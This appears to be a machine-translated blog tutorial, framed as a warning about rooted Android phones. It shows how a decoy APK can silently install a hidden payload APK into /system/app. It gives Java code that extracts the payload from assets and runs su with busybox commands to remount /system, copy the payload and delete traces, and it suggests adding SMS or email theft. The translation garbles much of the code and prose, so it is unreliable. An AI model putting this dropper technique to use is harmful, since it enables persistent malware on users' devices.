Premise: You have a root android phone with busybox and superuser
Guidance:
This article describes how to defend against a simple virus ". The reason for writing this blog is that there are countless users who feel that root has no risks, or the risks will not come to their own minds. Here we will tell you that the risks are all around you!
The content mentioned here is actually nothing new for most developers, and the technologies used are also very general and common.
Although we all know this can be done, we can still download the software at will. If you are not careful, it will fall into the trap.
Some people think that it is not that easy to check the permissions applied for when I download the software.
Let's take a look at what a software can do if it has obtained the root permission once?
Okay, let's start with "Silent Installation "!
The principle is very simple. Basically, it is equivalent to pushing the apk to the mobile phone. There are two options:
Data/app
System/app
If I am a virus software, I must push it to system/app.
Alibaba wants to create two apks. One is the real purpose (virus, real.apk.pdf, and the other is a fake shell (fake.apk)
Real.apkis first made, we just use it for testing, so this apkhas no memory internal content (download real.apk: http://www.bkjia.com/uploadfile/2012/0901/20120901112020892.zip
).
Real.apk has a receiver used to listen to the broadcast on startup.
[Xml] view plaincopy
Android. intent. action. BOOT_COMPLETED
There is also an activity that has no substantive content, and then compiles the apk to be used.
Let's create a shell.
Create an androidproject and copy real.apk to the assets Directory.
Create an activity to test
This shell is very simple. It is only responsible for installing the real application to the user's mobile phone. Let's further break it down. First, extract the file assets/real.apk and put it in your own private directory, in this example, the directory is data/com. example. fake/files. This step does not require any permissions.
[Java] view plaincopy
PrepareButton. setOnClickListener (new View. OnClickListener (){
Public void onClick (View v ){
File dataFolder = getFilesDir ();
File jar = new File (dataFolder. getAbsolutePath () + "/real.apk ");
CopyFile ("real.apk", jar, mResources );
}
});
For the copFile function, see the attachment (a simple io read/write operation). Here, only the pseudo code is provided.
[Java] view plaincopy
InputStream myInput = null;
Try
MyInput = resources. getAssets (). open (filePath );
......
Catch
......
Finally
......
The first step has been completed. The next step is to request rootpermission, and then the real.apk will be installed to the user maliciously.
Busybox needs to be used here. The command is as follows:
Busybox mount-o remount, rw/system
Busybox cp/data/com. example. fake/files/real.apk/system/app/real.apk
Busybox rm/data/com. example. fake/files/real.apk
Busybox is used because the mobile phone may not contain commands such as mount, cp, and rm (not in my mobile phone)
Of course, the superuser must agree to use the root permission.
So far, all your intrusions have been completed!
[Java] view plaincopy
InstallButton. setOnClickListener (new View. OnClickListener (){
Public void onClick (View v ){
String packageName = getPackageName ();
String [] commands = {"busybox mount-o remount, rw/system ",
"Busybox cp/data/" + packageName + "/files/real.apk/system/app/real.apk ",
"Busybox rm/data/" + packageName + "/files/real.apk "};
Process process = null;
DataOutputStream dataOutputStream = null;
Try {
Process = runtime.getruntime(cmd.exe c ("su ");
DataOutputStream = new DataOutputStream (process. getOutputStream ());
Int length = commands. length;
For (int I = 0; I <length; I ++ ){
Log. e (TAG, "commands [" + I + "]:" + commands [I]);
DataOutputStream. writeBytes (commands [I] + "\ n ");
}
DataOutputStream. writeBytes ("exit \ n ");
DataOutputStream. flush ();
Process. waitFor ();
} Catch (Exception e ){
Log. e (TAG, "copy fail", e );
} Finally {
Try {
If (dataOutputStream! = Null ){
DataOutputStream. close ();
}
Process. destroy ();
} Catch (Exception e ){
}
}
} Www.2cto.com
});
}
After restarting the mobile phone, real.apk will work and it will receive the boot Broadcast
If you embed worse code, such as text message stealing and email stealing, it is hard for users to detect.
Real.apk will be displayed in settings in system applications, and users will not doubt it. Even if they suspect it, they will not dare to uninstall it easily! Who asked them to brush their rom at will? Every rom integrated software is different.